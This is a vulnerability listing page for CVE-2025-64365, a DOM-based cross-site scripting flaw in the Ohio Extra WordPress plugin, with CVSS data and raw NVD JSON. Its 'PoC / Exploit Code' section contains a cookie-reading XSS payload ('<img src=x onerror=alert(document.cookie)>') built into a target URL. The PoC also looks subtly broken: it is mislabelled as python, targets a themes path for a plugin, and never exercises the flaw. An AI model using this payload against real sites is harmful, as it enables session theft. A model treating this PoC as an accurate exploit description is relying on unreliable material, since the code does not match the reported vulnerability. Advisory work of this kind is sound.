Security Vulnerability Report
中文
CVE-2025-64365 CVSS 6.5 MEDIUM

CVE-2025-64365

Published: 2025-10-31 12:15:37
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in colabrio Ohio Extra ohio-extra allows DOM-Based XSS.This issue affects Ohio Extra: from n/a through <= 3.6.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Ohio Extra <= 3.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-64365 PoC - DOM-based XSS in Ohio Extra --> <script> // 构造恶意URL,触发DOM XSS const maliciousPayload = '<img src=x onerror=alert(document.cookie)>'; const targetUrl = window.location.origin + '/wp-content/themes/ohio-extra/?search=' + encodeURIComponent(maliciousPayload); // 自动化PoC测试 console.log('Target URL:', targetUrl); // 模拟攻击场景 const testXSS = () => { // 查找可能的注入点 const params = new URLSearchParams(window.location.search); const userInput = params.get('search') || params.get('query') || params.get('s'); if (userInput) { // 检查是否存在未过滤的输出点 const dangerousSinks = ['innerHTML', 'outerHTML', 'document.write', 'insertAdjacentHTML']; console.log('Potential injection point found:', userInput); console.log('XSS payload:', maliciousPayload); } }; testXSS(); </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64365", "sourceIdentifier": "[email protected]", "published": "2025-10-31T12:15:37.120", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in colabrio Ohio Extra ohio-extra allows DOM-Based XSS.This issue affects Ohio Extra: from n/a through <= 3.6.0."}, {"lang": "es", "value": "Vulnerabilidad de Neutralización incorrecta de la entrada durante la generación de páginas web ('Cross-site Scripting') en colabrio Ohio Extra ohio-extra permite XSS basado en DOM. Este problema afecta a Ohio Extra: desde n/a hasta menor igual que 3.6.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ohio-extra/vulnerability/wordpress-ohio-extra-plugin-3-6-0-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}